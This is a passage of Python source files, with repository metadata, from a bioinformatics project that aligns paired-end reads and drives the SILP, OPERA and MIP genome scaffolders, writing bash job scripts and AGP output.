category=DeprecationWarning)\n\n### classes ###\n\n### functions ###\n\ndef align(args):\n ''' aligns reads against reference '''\n\n # validate parameters.\n assert os.path.isdir(args.base_dir), 'base_dir'\n assert os.path.isfile(args.ctg_fasta), 'ctg_fasta'\n assert os.path.isfile(args.read1_fastq), 'read1_fastq'\n assert os.path.isfile(args.read2_fastq), 'read2_fastq'\n assert os.path.isfile(args.size_file), 'size_file'\n\n # relavent files.\n base_dir = os.path.abspath(args.base_dir)\n\n size_file = os.path.abspath(args.size_file)\n ctg_fasta = os.path.abspath(args.ctg_fasta)\n read1_fastq = os.path.abspath(args.read1_fastq)\n read2_fastq = os.path.abspath(args.read2_fastq)\n\n tmp1_sam = os.path.abspath('%s/tmp1.sam' % base_dir)\n tmp2_sam = os.path.abspath('%s/tmp2.sam' % base_dir)\n\n read1_sam = os.path.abspath('%s/read1.sam' % base_dir)\n read2_sam = os.path.abspath('%s/read2.sam' % base_dir)\n\n ant_dir = '%s/ant' % base_dir\n idx_dir = '%s/index' % base_dir\n idx_file = '%s/index' % idx_dir\n\n # build index if not present.\n if os.path.isdir(idx_dir) == False:\n subprocess.call([\"mkdir\", \"-p\", idx_dir])\n create_idx(ctg_fasta, idx_file)\n\n # remove annotation dir if present.\n if os.path.isdir(ant_dir) == True:\n subprocess.call([\"rm\", \"-rf\", ant_dir])\n subprocess.call([\"mkdir\", \"-p\", ant_dir])\n\n # perform alignment.\n create_aln(size_file, idx_file, read1_fastq, tmp1_sam, ant_dir, args.num_cpu)\n create_aln(size_file, idx_file, read2_fastq, tmp2_sam, ant_dir, args.num_cpu)\n\n # pair the alignment.\n pair_sam2(tmp1_sam, tmp2_sam, read1_sam, read2_sam, args.key_size)\n\ndef pair(args):\n ''' pairs two same files '''\n\n # validate parameters.\n assert os.path.isdir(args.base_dir), 'base_dir'\n assert os.path.isfile(args.tmp1_sam), 'tmp1_sam'\n assert os.path.isfile(args.tmp2_sam), 'tmp2_sam'\n\n # relavent files.\n base_dir = os.path.abspath(args.base_dir)\n tmp1_sam = os.path.abspath(args.tmp1_sam)\n tmp2_sam = os.path.abspath(args.tmp2_sam)\n read1_sam = os.path.abspath('%s/read1.sam' % base_dir)\n read2_sam = os.path.abspath('%s/read2.sam' % base_dir)\n\n # pair the alignment.\n pair_sam2(tmp1_sam, tmp2_sam, read1_sam, read2_sam, args.key_size)\n\ndef meta_combine(args):\n \"\"\" combines two seperate alignments\"\"\"\n\n # validate parameters.\n assert os.path.isdir(args.base_dir), 'base_dir'\n assert os.path.isdir(args.work1_dir), 'w1_dir'\n assert os.path.isdir(args.work2_dir), 'w2_dir'\n\n # switch based on subset.\n if args.subsample == None:\n\n # combine reads.\n with open(\"%s/read1.sam\" % args.base_dir, \"wb\") as fout:\n subprocess.call([\"cat\",\"%s/read1.sam\" % args.work1_dir, \"%s/read1.sam\" % args.work2_dir], stdout=fout)\n\n with open(\"%s/read2.sam\" % args.base_dir, \"wb\") as fout:\n subprocess.call([\"cat\",\"%s/read2.sam\" % args.work1_dir, \"%s/read2.sam\" % args.work2_dir], stdout=fout)\n\n else:\n\n # count number of lines.\n cnt = 0\n with open(\"%s/read1.sam\" % args.work1_dir, \"r\") as fin:\n for line in fin:\n cnt += 1\n \n # only output a percentage of them.\n outp = float(cnt) * float(args.subsample)\n \n # first one.\n with open(\"%s/read1.sam\" % args.base_dir, \"wb\") as fout:\n cnt = 0\n with open(\"%s/read1.sam\" % args.work1_dir, \"r\") as fin:\n for line in fin:\n if cnt > outp: break\n fout.write(line)\n cnt += 1\n with open(\"%s/read1.sam\" % args.work2_dir, \"r\") as fin:\n for line in fin:\n fout.write(line)\n \n # second one.\n with open(\"%s/read2.sam\" % args.base_dir, \"wb\") as fout:\n cnt = 0\n with open(\"%s/read2.sam\" % args.work1_dir, \"r\") as fin:\n for line in fin:\n if cnt > outp: break\n fout.write(line)\n cnt += 1\n with open(\"%s/read2.sam\" % args.work2_dir, \"r\") as fin:\n for line in fin:\n fout.write(line)\n\n # copy one annotation.\n subprocess.call([\"cp\", \"%s/ant\" % args.work1_dir, \"%s/ant\" % args.base_dir, \"-R\"])\n subprocess.call([\"chmod\", \"u+w\", \"%s/ant\" % args.base_dir, \"-R\"])\n\n # combine the rest.\n tmp1_dir = \"%s/ant\" % args.base_dir\n tmp2_dir = \"%s/ant\" % args.work2_dir\n for x in os.listdir(tmp2_dir):\n\n # simplify.\n tmp1_x = \"%s/%s\" % (tmp1_dir,x)\n tmp2_x = \"%s/%s\" % (tmp2_dir,x)\n \n # copy it if no problem.\n if os.path.isfile(tmp1_x) == False:\n subprocess.call([\"cp\", tmp2_x, tmp1_x])\n\n else:\n # combine it.\n tmp1_n = np.load(tmp1_x)\n tmp2_n = np.load(tmp2_x)\n np.save(tmp1_x, tmp1_n+tmp2_n)\n\ndef prepare(args):\n \"\"\" prepares alignment given scaffolding method\"\"\"\n\n # extract information.\n work_dir = os.path.abspath(args.base_dir)\n align_dir = os.path.abspath(args.align_dir)\n ant_dir = '%s/ant' % align_dir\n\n read1_sam = '%s/read1.sam' % align_dir\n read2_sam = '%s/read2.sam' % align_dir\n ctg_fasta = os.path.abspath(args.ctg_fasta)\n prep_sh = '%s/prep.sh' % work_dir\n\n # translate pairmode.\n if args.pair_mode == 0:\n pair_mode = 'ff'\n elif args.pair_mode == 1:\n pair_mode = 'fr'\n elif args.pair_mode == 2:\n pair_mode = 'rf'\n\n # run the right prepare.\n cmd_args = (work_dir, ant_dir, prep_sh, ctg_fasta, read1_sam, read2_sam, args.ins_size, args.std_dev, args.bundle_size, pair_mode, args)\n if args.meth_mode == 0:\n prep_silp(*cmd_args)\n elif args.meth_mode == 1:\n prep_opera(*cmd_args)\n elif args.meth_mode == 2:\n prep_mip(*cmd_args)\n\n\ndef run(args):\n \"\"\" extracts information for scaffolding\"\"\"\n\n # extract information.\n work_dir = os.path.abspath(args.base_dir)\n align_dir = os.path.abspath(args.align_dir)\n ant_dir = '%s/ant' % align_dir\n\n read1_sam = '%s/read1.sam' % align_dir\n read2_sam = '%s/read2.sam' % align_dir\n ctg_fasta = os.path.abspath(args.ctg_fasta)\n ctg_agp = '%s/scf.agp' % work_dir\n scf_fasta = '%s/scf.fasta' % work_dir\n run_sh = '%s/run.sh' % work_dir\n\n # translate pairmode.\n if args.pair_mode == 0:\n pair_mode = 'ff'\n elif args.pair_mode == 1:\n pair_mode = 'fr'\n elif args.pair_mode == 2:\n pair_mode = 'rf'\n\n # run the right prepare.\n cmd_args = (work_dir, ant_dir, run_sh, ctg_fasta, scf_fasta, ctg_agp, read1_sam, read2_sam, args.ins_size, args.std_dev, args.bundle_size, pair_mode, args)\n if args.meth_mode == 0:\n run_silp(*cmd_args)\n elif args.meth_mode == 1:\n run_opera(*cmd_args)\n elif args.meth_mode == 2:\n run_mip(*cmd_args)\n\ndef sim_eval(args):\n \"\"\"evaluates scaffold\"\"\"\n\n # simplify data.\n ref_fasta = os.path.abspath(args.ref_fasta)\n ctg_fasta = os.path.abspath(args.ctg_fasta)\n scf_fasta = os.path.abspath(args.scf_fasta)\n ref_agp = os.path.abspath(args.ref_agp)\n scf_agp = os.path.abspath(args.scf_agp)\n\n # call evaluation code.\n A, B, C, D, ppv, mcc, gap_dev, runtime, ref_N50, ctg_N50, scf_N50, tp_N50 = simulation_evaluation(ref_fasta, ctg_fasta, scf_fasta, ref_agp, scf_agp)\n\n # format and return.\n txt = list()\n txt.append('%d %d %d %d' % (A, B, C, D))\n txt.append('%.2f %.2f' % (ppv, mcc))\n txt.append('%.2f %.2f' % (gap_dev, runtime))\n txt.append('%d %d %d %d' % (ref_N50, ctg_N50, scf_N50, tp_N50))\n print ' '.join(txt)\n\ndef real_eval(args):\n \"\"\"evaluates scaffold using alignme\"\"\"\n\n # simplify data.\n ref_fasta = os.path.abspath(args.ref_fasta)\n ctg_fasta = os.path.abspath(args.ctg_fasta)\n scf_fasta = os.path.abspath(args.scf_fasta)\n #ref_agp = os.path.abspath(args.ref_agp)\n #scf_agp = os.path.abspath(args.scf_agp)\n\n # call quast\n res = quast_evaluation(ref_fasta, ctg_fasta, scf_fasta, args.wd, args.threads)\n\n\n # quast specific.\n try: N50 = int(float(res[1,np.where(res[0,:] == \"N50\")[0][0]]))\n except: N50 = 0\n try: NG50 = int(float(res[1,np.where(res[0,:] == \"NG50\")[0][0]]))\n except: NG50 = 0\n try: GFRAC = float(res[1,np.where(res[0,:] == \"Genome fraction (%)\")[0][0]])\n except: GFRAC = 0.0\n try: NA50 = int(float(res[1,np.where(res[0,:] == \"NA50\")[0][0]]))\n except: NA50 = 0\n try: NGA50 = int(float(res[1,np.where(res[0,:] == \"NGA50\")[0][0]]))\n except: NGA50 = 0\n\n # format and return.\n txt = list()\n txt.append(\"%d %d %.2f %d %d\" % (N50, NG50, GFRAC, NA50, NGA50))\n\n print ' '.join(txt)\n\n### script ###\n\nif __name__ == '__main__':\n\n # mode parser.\n main_p = argparse.ArgumentParser()\n subp = main_p.add_subparsers(help='sub-command help')\n\n ### data preparation ###\n # import reference into working directory.\n subp_p = subp.add_parser('align', help='aligns reads against contigs.')\n subp_p.add_argument('-w', dest='base_dir', required=True, help='working directory')\n subp_p.add_argument('-p', dest='num_cpu', type=int, required=True, help='number of threads for bowtie2')\n subp_p.add_argument('-c', dest='ctg_fasta', required=True, help='contig fasta')\n subp_p.add_argument('-q1', dest='read1_fastq', required=True, help='read first file')\n subp_p.add_argument('-q2', dest='read2_fastq', required=True, help='read second file')\n subp_p.add_argument('-s', dest='size_file', required=True, help='size file')\n subp_p.add_argument('-k', dest='key_size', type=int, required=True, help='size of PE key at end of each read')\n subp_p.set_defaults(func=align)\n\n subp_p = subp.add_parser('pair', help='pairs 2 SAM files')\n subp_p.add_argument('-w', dest='base_dir', required=True, help='working directory')\n subp_p.add_argument('-s1', dest='tmp1_sam', required=True, help='read first file')\n subp_p.add_argument('-s2', dest='tmp2_sam', required=True, help='read second file')\n subp_p.add_argument('-k', dest='key_size', type=int, required=True, help='size of PE key at end of each read')\n subp_p.set_defaults(func=pair)\n\n # combines two seperate alignments.\n subp_p = subp.add_parser('meta_combine', help='combines two seperate alignments. Used for meta scaffold testing.')\n subp_p.add_argument('-w', dest='base_dir', required=True, help='working directory')\n subp_p.add_argument('-w1', dest='work1_dir', required=True, help='working directory')\n subp_p.add_argument('-w2', dest='work2_dir', required=True, help='working directory')\n subp_p.add_argument('-s', dest='subsample', type=float, required=False, help='subsample first directory')\n subp_p.set_defaults(func=meta_combine)\n\n # prepare the reference for scaffolding.\n subp_p = subp.add_parser('prep', help='runs pre-processing stage.')\n subp_p.add_argument('-c', dest='ctg_fasta', required=True, help='contig fasta')\n subp_p.add_argument('-w', dest='base_dir', required=True, help='scaffolding directory')\n subp_p.add_argument('-a', dest='align_dir', required=True, help='alignment directory')\n subp_p.add_argument('-i', dest='ins_size', type=int, required=True, help='insert size')\n subp_p.add_argument('-s', dest='std_dev', type=int, required=True, help='std_devition')\n subp_p.add_argument('-b', dest='bundle_size', type=int, required=True, help='bundle size')\n me_g = subp_p.add_mutually_exclusive_group(required=True)\n me_g.add_argument('-ff', dest='pair_mode', action='store_const', const=0, help='SOLiD style -> ->')\n me_g.add_argument('-fr', dest='pair_mode', action='store_const', const=1, help='innie style -> <-')\n me_g.add_argument('-rf', dest='pair_mode', action='store_const', const=2, help='outtie style <- ->')\n me_g = subp_p.add_mutually_exclusive_group(required=True)\n me_g.add_argument('-silp', dest='meth_mode', action='store_const', const=0, help='SILP')\n me_g.add_argument('-opera', dest='meth_mode', action='store_const', const=1, help='OPERA')\n me_g.add_argument('-mip', dest='meth_mode', action='store_const', const=2, help='MIP')\n subp_p.set_defaults(func=prepare)\n\n # run the scaffolding.\n subp_p = subp.add_parser('run', help='runs the actual scaffolding')\n subp_p.add_argument('-c', dest='ctg_fasta', required=True, help='contig fasta')\n subp_p.add_argument('-w', dest='base_dir', required=True, help='scaffolding directory')\n subp_p.add_argument('-a', dest='align_dir', required=True, help='alignment directory')\n subp_p.add_argument('-i', dest='ins_size', type=int, required=True, help='insert size')\n subp_p.add_argument('-s', dest='std_dev', type=int, required=True, help='std_devition')\n subp_p.add_argument('-b', dest='bundle_size', type=int, required=True, help='bundle size')\n me_g = subp_p.add_mutually_exclusive_group(required=True)\n me_g.add_argument('-ff', dest='pair_mode', action='store_const', const=0, help='SOLiD style -> ->')\n me_g.add_argument('-fr', dest='pair_mode', action='store_const', const=1, help='innie style -> <-')\n me_g.add_argument('-rf', dest='pair_mode', action='store_const', const=2, help='outtie style <- ->')\n me_g = subp_p.add_mutually_exclusive_group(required=True)\n me_g.add_argument('-silp', dest='meth_mode', action='store_const', const=0, help='SILP')\n me_g.add_argument('-opera', dest='meth_mode', action='store_const', const=1, help='OPERA')\n me_g.add_argument('-mip', dest='meth_mode', action='store_const', const=2, help='MIP')\n # SILP2 arguments.\n subp_p.add_argument('-z', dest='weight_mode', type=int, default=0, help='SILP2: weight mode')\n subp_p.set_defaults(func=run)\n\n # evaluate the scaffolding.\n subp_p = subp.add_parser('sim_eval', help='evaluates scaffolding if there is a true AGP')\n subp_p.add_argument('-r', dest='ref_fasta', required=True, help='reference fasta')\n subp_p.add_argument('-c', dest='ctg_fasta', required=True, help='contig fasta')\n subp_p.add_argument('-s', dest='scf_fasta', required=True, help='scaffold fasta')\n subp_p.add_argument('-a', dest='ref_agp', required=True, help='reference agp')\n subp_p.add_argument('-y', dest='scf_agp', required=True, help='predicted agp')\n subp_p.set_defaults(func=sim_eval)\n\n # evaluate the scaffolding.\n subp_p = subp.add_parser('real_eval', help='alignment based scaffold evaluation.')\n subp_p.add_argument('-r', dest='ref_fasta', required=True, help='reference fasta')\n subp_p.add_argument('-c', dest='ctg_fasta', required=True, help='contig fasta')\n subp_p.add_argument('-s', dest='scf_fasta', required=True, help='scaffold fasta')\n subp_p.add_argument('-y', dest='scf_agp', required=True, help='predicted agp')\n subp_p.add_argument('-wd', dest='wd', required=True, help='alignment working directory')\n subp_p.add_argument('-p', dest='threads', type=int, required=True, help='number of threads to align')\n subp_p.set_defaults(func=real_eval)\n\n args = main_p.parse_args()\n args.func(args)\n" }, { "alpha_fraction": 0.492044597864151, "alphanum_fraction": 0.5010282397270203, "avg_line_length": 28.996753692626953, "blob_id": "4b73b226cb70b797a4d76f19ced2424522dc0848", "content_id": "7c8f300d3e7e1ca4a613c8ea4663795fedce5b01", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9239, "license_type": "permissive", "max_line_length": 143, "num_lines": 308, "path": "/utils/run.py", "repo_name": "jim-bo/scafathon", "src_encoding": "UTF-8", "text": "'''\ndrivers to prepare the data for scaffolding\n'''\nimport subprocess\nimport os\nimport time\nimport numpy as np\n\nfrom utils.misc import *\n\n## private functions ##\n\n## public functions ##\ndef run_silp(work_dir, ant_dir, run_sh, ctg_fasta, scf_fasta, ctg_agp, read1_sam, read2_sam, ins_size, std_dev, bundle_size, pair_mode, args):\n \"\"\" SILP scaffolder \"\"\"\n\n # create command base.\n cmd_base = ['python', '/home/jrl03001/code/SILP2/silp.py']\n\n # scaffolding/\n job = list()\n job.append('#!/bin/bash')\n job.append('# scaffolding')\n job.append('# start time')\n job.append('start=$(date +%s)')\n job.append('%s orient -w %s -z %s ' % (' '.join(cmd_base), work_dir, args.weight_mode))\n job.append('%s order -w %s ' % (' '.join(cmd_base), work_dir))\n job.append('%s gap -w %s ' % (' '.join(cmd_base), work_dir))\n job.append('%s write -w %s -a %s' % (' '.join(cmd_base), work_dir, ctg_agp))\n job.append('%s fasta -w %s -a %s -c %s -f %s' % (' '.join(cmd_base), work_dir, ctg_agp, ctg_fasta, scf_fasta))\n job.append('# stop time')\n job.append('stop=$(date +%s)')\n job.append('echo RUNTIME: $(expr $stop - $start) >> %s' % ctg_agp)\n job.append('')\n runit(job, run_sh)\n\n\ndef run_opera(work_dir, ant_dir, run_sh, ctg_fasta, scf_fasta, ctg_agp, read1_sam, read2_sam, ins_size, std_dev, bundle_size, pair_mode, args):\n \"\"\" OPERA scaffolder \"\"\"\n\n # opera specific directories.\n input_dir = '%s/input' % work_dir\n results_dir = '%s/results' % work_dir\n script_dir = '%s/script' % work_dir\n output_dir = '%s/output' % work_dir\n log_dir = '%s/log' % work_dir\n for x in [input_dir, results_dir, script_dir, output_dir, log_dir]:\n create_dir(x)\n\n # opera sepecific files.\n edge_file = '%s/opera_raw.txt' % input_dir\n config_file = '%s/opera.cfg' % input_dir\n script_file = '%s/opera.sh' % input_dir\n tout_file = '%s/scaffolds.scaf' % results_dir\n tscf_file = '%s/scaffoldSeq.fasta' % results_dir\n log_file = '%s/opera.log' % log_dir\n\n # write execution script.\n job = list()\n job.append('#!/bin/bash')\n job.append('# scaffolding')\n job.append('# start time')\n job.append('start=$(date +%s)')\n job.append('# run the job')\n job.append('/opt/opera/bin/opera %s &> %s' % (config_file, log_file))\n job.append('# stop time')\n job.append('stop=$(date +%s)')\n job.append('echo RUNTIME: $(expr $stop - $start) >> %s' % ctg_agp)\n job.append('')\n runit(job, run_sh)\n\n # load results.\n fin = open(tout_file, \"rb\")\n lines = fin.readlines()\n fin.close()\n\n # load the runtime string.\n with open(ctg_agp, 'rb') as fin:\n time_info = fin.readline().strip()\n\n # create an AGP.\n fout = open(ctg_agp, \"wb\")\n for lidx in range(len(lines)):\n\n # setup line.\n line = lines[lidx]\n\n # check header.\n if line[0] == \">\":\n header = line.strip().replace(\">\",\"\").split()[0]\n #header = line.strip().replace(\">\",\"\")\n part = 1\n scaf_start = 1\n scaf_stop = 0\n continue\n\n # tokenize.\n tmp = line.strip().split()\n\n # get ctgid.\n ctgid = tmp[0]\n\n if tmp[1] == \"BE\":\n orien = \"+\"\n else:\n orien = \"-\"\n\n ctglen = int(tmp[2])\n gaplen = int(tmp[3])\n\n # make indexs.\n scaf_stop = scaf_start + ctglen\n\n # write out AGP.\n fout.write(\"%s\\t%i\\t%i\\t%i\\t%s\\t%s\\t%i\\t%i\\t%s\\n\" % \\\n (header, scaf_start, scaf_stop, part, \"W\", ctgid, 1, ctglen, orien))\n #print \"write\"\n # increment pointers.\n scaf_start = scaf_stop + 1\n part += 1\n\n # add gap if size is not 0\n if gaplen != 0:\n\n # make indexs.\n scaf_stop = scaf_start + gaplen\n\n # add gap.\n fout.write(\"%s\\t%i\\t%i\\t%i\\t%s\\t%i\\t%s\\t%s\\n\" % \\\n (header, scaf_start, scaf_stop, part, \"N\", gaplen, \"fragment\", \"no\"))\n #print \"write\"\n # increment pointers.\n scaf_start = scaf_stop + 1\n part += 1\n\n # otherwise.\n else:\n # check if we can peak.\n if lidx+1 >= len(lines):\n continue\n\n\n # check if new scaffold.\n if lines[lidx+1][0] != \">\":\n # make fake gap.\n scaf_stop = scaf_start + 10\n\n # add gap.\n fout.write(\"%s\\t%i\\t%i\\t%i\\t%s\\t%i\\t%s\\t%s\\n\" % \\\n (header, scaf_start, scaf_stop, part, \"N\", gaplen, \"fragment\", \"no\"))\n #print \"write\"\n # increment pointers.\n scaf_start = scaf_stop + 1\n part += 1\n continue\n\n # write the timer.\n fout.write(time_info + '\\n')\n\n # close AGP file.\n fout.close()\n\n # move the output files to standard locations.\n subprocess.call(['cp', tscf_file, scf_fasta])\n\n\ndef run_mip(work_dir, ant_dir, run_sh, ctg_fasta, scf_fasta, ctg_agp, read1_sam, read2_sam, ins_size, std_dev, bundle_size, pair_mode, args):\n \n # simplify files.\n ant_dir = '/dev/null'\n\n contig_file = ctg_fasta\n test1 = read1_sam\n test2 = read2_sam\n \n # mip specific files.\n SAM_1_MOD = \"%s/sam_1.sam\" % work_dir\n SAM_2_MOD = \"%s/sam_2.sam\" % work_dir\n MERGED_FILE = \"%s/merged\" % work_dir\n MERGED1_FILE = \"%s/merged.sorted1\" % work_dir\n MERGED2_FILE = \"%s/merged.sorted2\" % work_dir\n FILTERED_FILE = \"%s/filtered.txt\" % work_dir\n COV_FILE = \"%s/coverage.txt\" % work_dir\n PARAM_FILE = \"%s/parameters.txt\" % work_dir\n MIP_FILE = \"%s/scaffolds2.txt\" % work_dir\n OUT_FILE = \"%s/scaffolds.fasta\" % work_dir\n\n \n # execute mip.\n tstart = time.time()\n cmd = list()\n cmd.append(\"/opt/mip/scripts/mip-scaffolder.pl\")\n cmd.append(PARAM_FILE)\n cmd.append(contig_file)\n cmd.append(COV_FILE)\n cmd.append(work_dir)\n \n with open(run_sh, \"wb\") as fout:\n fout.write('#!/bin/bash\\n')\n fout.write(' '.join(cmd) + '\\n')\n \n subprocess.call([\"chmod\", \"u+x\", run_sh])\n if subprocess.call([run_sh], cwd=work_dir) != 0:\n logging.warning(\"couldn't run mip\")\n sys.exit(1)\n tstop = time.time()\n \n # compute time.\n trun = tstop - tstart\n \n # load MIP results into dictionary.\n fin = open(MIP_FILE, \"rb\")\n lines = fin.readlines()\n fin.close()\n mip = {}\n for line in lines:\n \n # tokenize.\n tmp = line.split()\n \n # set current scaffold.\n if tmp[0].count(\"scaffold\") > 0:\n # set current.\n curs = tmp[0]\n \n # set default.\n mip[curs] = []\n continue\n \n # append.\n mip[curs].append(tmp)\n \n # count the number of rows for agp file.\n size = 0\n for scafid in mip:\n size += len(mip[scafid]) + len(mip[scafid]) - 1\n\n # allocate the array.\n agps = np.zeros(size, dtype=agp_dt)\n\n # begin copying data.\n idx = 0\n for scafid in mip:\n scaf_start = 1\n scaf_idx = 1\n for i in range(len(mip[scafid])):\n \n # tokenize.\n entry = mip[scafid][i]\n ctg_name = entry[1]\n if entry[2] == \"F\":\n orien = 0\n else:\n orien = 1\n start = int(entry[3])\n stop = int(entry[4])\n \n # add to agp.\n agps[idx]['scaf_name'] = scafid\n agps[idx]['scaf_start'] = scaf_start\n agps[idx]['scaf_stop'] = scaf_start + abs(stop - start)\n agps[idx]['scaf_idx'] = scaf_idx\n agps[idx]['comp_type'] = \"W\"\n agps[idx]['comp_name'] = ctg_name\n agps[idx]['comp_start'] = 1\n agps[idx]['comp_stop'] = abs(stop - start)\n agps[idx]['comp_orien'] = orien\n agps[idx]['comp_linkage'] = 0\n\n # move up counts.\n scaf_start = agps[idx]['scaf_stop'] + 1\n scaf_idx += 1\n idx += 1\n \n # do gap.\n if entry[1] != mip[scafid][-1][1]:\n \n # add gap.\n agps[idx]['scaf_name'] = scafid\n agps[idx]['scaf_start'] = scaf_start\n agps[idx]['scaf_stop'] = int(mip[scafid][i+1][3]) - 1\n agps[idx]['scaf_idx'] = scaf_idx\n agps[idx]['comp_type'] = \"N\"\n agps[idx]['comp_name'] = \"fragment\"\n agps[idx]['comp_start'] = 1\n agps[idx]['comp_stop'] = abs(agps[idx]['scaf_stop'] - agps[idx]['scaf_start'])\n agps[idx]['comp_orien'] = 0\n agps[idx]['comp_linkage'] = 0 \n \n # move up counts.\n scaf_start = int(mip[scafid][i+1][3])\n scaf_idx += 1\n idx += 1\n\n # copy results.\n subprocess.call(['cp', OUT_FILE, scf_fasta])\n\n # save the agp.\n save_agps(ctg_agp, agps)\n\n # add time.\n with open(ctg_agp, 'rb') as fin:\n lines = fin.read()\n lines += 'RUNTIME: %.2f' % trun\n with open(ctg_agp, 'wb') as fout:\n fout.write(lines)\n \n # move the results.\n" }, { "alpha_fraction": 0.5634479522705078, "alphanum_fraction": 0.5879085659980774, "avg_line_length": 28.347963333129883, "blob_id": "23fb19e71a1584efb496e8b0dceba6961f3c1cfb", "content_id": "825f69eff1e75df7cb3760926609f855d9f39086", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9362, "license_type": "permissive", "max_line_length": 167, "num_lines": 319, "path": "/utils/prep.py", "repo_name": "jim-bo/scafathon", "src_encoding": "UTF-8", "text": "'''\ndrivers to prepare the data for scaffolding\n'''\nimport sys\nimport logging\nimport string\nimport subprocess\nimport os\n\nfrom utils.misc import *\n\n## private functions ##\n\n## public functions ##\ndef prep_silp(work_dir, ant_dir, prep_sh, ctg_fasta, read1_sam, read2_sam, ins_size, std_dev, bundle_size, pair_mode, args):\n \"\"\" SILP scaffolder \"\"\"\n\n # create command base.\n cmd_base = ['python', '/home/jrl03001/code/SILP2/silp.py']\n\n # preprocess.\n job = list()\n job.append('#!/bin/bash')\n job.append('# preprocess')\n job.append('%s nodes -w %s -c %s' % (' '.join(cmd_base), work_dir, ctg_fasta))\n job.append('%s edges -w %s -i %i -s %i -%s -s1 %s -s2 %s' %\n (' '.join(cmd_base), work_dir, ins_size, std_dev, pair_mode, read1_sam, read2_sam))\n job.append('%s bundles -w %s -b %i -p 90 -bup 1 -r %s -i %i -s %i' % (' '.join(cmd_base), work_dir, bundle_size, ant_dir, ins_size, std_dev))\n job.append('%s decompose -w %s -m 2500' % (' '.join(cmd_base), work_dir))\n job.append('')\n runit(job, prep_sh)\n\ndef prep_opera(work_dir, ant_dir, prep_sh, ctg_fasta, read1_sam, read2_sam, ins_size, std_dev, bundle_size, pair_mode, args):\n \"\"\" opera scaffolder \"\"\"\n\n # opera specific directories.\n input_dir = '%s/input' % work_dir\n results_dir = '%s/results' % work_dir\n script_dir = '%s/script' % work_dir\n output_dir = '%s/output' % work_dir\n log_dir = '%s/log' % work_dir\n for x in [input_dir, results_dir, script_dir, output_dir, log_dir]:\n create_dir(x)\n\n # opera sepecific files.\n edge_file = '%s/opera_raw.txt' % input_dir\n config_file = '%s/opera.cfg' % input_dir\n script_file = '%s/opera.sh' % input_dir\n tout_file = '%s/scaffolds.scaf' % results_dir\n log_file = '%s/opera.log' % log_dir\n\n # open pair of sam files.\n fin1 = open(read1_sam, \"rb\")\n fin2 = open(read2_sam, \"rb\")\n fout = open(edge_file, 'wb')\n\n # create the edge file from paired sam.\n idx = 1\n for line1 in fin1:\n line2 = fin2.readline()\n\n # skip headers.\n if line1[0] == \"@\" or line2[0] == \"@\":\n continue\n\n # tokenize.\n tokens1 = line1.strip().split(\"\\t\")\n tokens2 = line2.strip().split(\"\\t\")\n\n # get data.\n rname1 = tokens1[2]\n rname2 = tokens2[2]\n\n qname1 = tokens1[0]\n qname2 = tokens2[0]\n\n pos1 = int(tokens1[3])\n pos2 = int(tokens2[3])\n\n szseq1 = len(tokens1[9])\n szseq2 = len(tokens2[9])\n\n seq1 = tokens1[9]\n seq2 = tokens2[9]\n\n # prepare orientation.\n if tokens1[1] == \"0\":\n orien1 = \"+\"\n else:\n orien1 = \"-\"\n if tokens2[1] == \"0\":\n orien2 = \"+\"\n else:\n orien2 = \"-\"\n\n # save names.\n nm1 = \"%i.1\" % idx\n nm2 = \"%i.2\" % idx\n idx += 1\n\n # create txt.\n line1 = \"%s\\t%s\\t%s\\t%i\\t%s\\t%s\\t%s\\n\" % (nm1, orien1, rname1, pos1, tokens1[9], tokens1[10], \"0\")\n line2 = \"%s\\t%s\\t%s\\t%i\\t%s\\t%s\\t%s\\n\" % (nm2, orien2, rname2, pos2, tokens2[9], tokens2[10], \"0\")\n\n # write to file.\n fout.write(line1)\n fout.write(line2)\n\n # close up shop.\n fin1.close()\n fin2.close()\n fout.close()\n\n # prepare config script\n txt = \"\"\"#\n# Essential Parameters\n#\n\n# Please always supply absolute path of each file,\n# Because relative path may not work all the time.\n\n# Output folder for final results\noutput_folder=${opera_results_dir}\n\n# Contig file\ncontig_file=${opera_node_file}\n\n#----------------------------------------------------------------------------------------------\n# Advanced Parameters\n\n#\n# Scaffolding related parameters\n#\n\n# Scaffold name in result file\nscaffold_name=scaffold\n\n# PET cluster threshold (default=5) (Opera will discard all clusters\n\n# Should Opera abort when running time for specific subgraph is longer\n# than 30 minutes (true or false, default=true)\nabort=false\n\n#----------------------------------------------------------------------------------------------\n#\n# Contig file related parameters\n#\n\n# Format of contig file (fasta or statistic, default=fasta)\nfile_format=fasta\n\n# Program name generating contig file (velvet or soap, default=velvet)\nfile_type=velvet\n\n# Should the repeat contigs be filtered (yes or no, default=true)\nfilter_repeat=yes\n\n# Repeat threshold (default=1.5): If the coverage of a contig is higher than\n# (repeat threshold * average coverage), then it is considered as repeat\nrepeat_threshold=1.5\n\n# Contig size threshold (default=500): Opera will not use the contigs whose length\n# is shorter than this value\ncontig_size_threshold=10\n\n#----------------------------------------------------------------------------------------------\n#\n# Library parameters.\n#\n\n[LIB]\ncalculate_ori=no\nread_ori=in\nmap_type=bowtie\ncalculate_lib=no\nlib_mean=${lib_mean}\nlib_std=${lib_std}\ncluster_threshold=${pet_size}\nmap_file=${opera_edge_file}\n\"\"\"\n txt = string.Template(txt)\n txt = txt.substitute(opera_results_dir=results_dir, opera_node_file=ctg_fasta, opera_edge_file=edge_file, pet_size=bundle_size, lib_mean=ins_size, lib_std=std_dev)\n\n # write to file.\n fout = open(config_file, \"wb\")\n fout.write(txt)\n fout.close()\n\n\ndef prep_mip(work_dir, ant_dir, prep_sh, ctg_fasta, read1_sam, read2_sam, ins_size, std_dev, bundle_size, pair_mode, args):\n \"\"\" mip scaffolder \"\"\"\n\n # simplify files.\n ant_dir = '/dev/null'\n pre_sh = prep_sh\n\n contig_file = ctg_fasta\n test1 = read1_sam\n test2 = read2_sam\n \n # sanity.\n if os.path.isfile(test1) == False or os.path.isfile(test2) == False:\n logging.error(\"missing file:\")\n logging.error(test1)\n logging.error(test2)\n \n # mip specific files.\n SAM_1_MOD = \"%s/sam_1.sam\" % work_dir\n SAM_2_MOD = \"%s/sam_2.sam\" % work_dir\n MERGED_FILE = \"%s/merged\" % work_dir\n MERGED1_FILE = \"%s/merged.sorted1\" % work_dir\n MERGED2_FILE = \"%s/merged.sorted2\" % work_dir\n FILTERED_FILE = \"%s/filtered.txt\" % work_dir\n COV_FILE = \"%s/coverage.txt\" % work_dir\n PARAM_FILE = \"%s/parameters.txt\" % 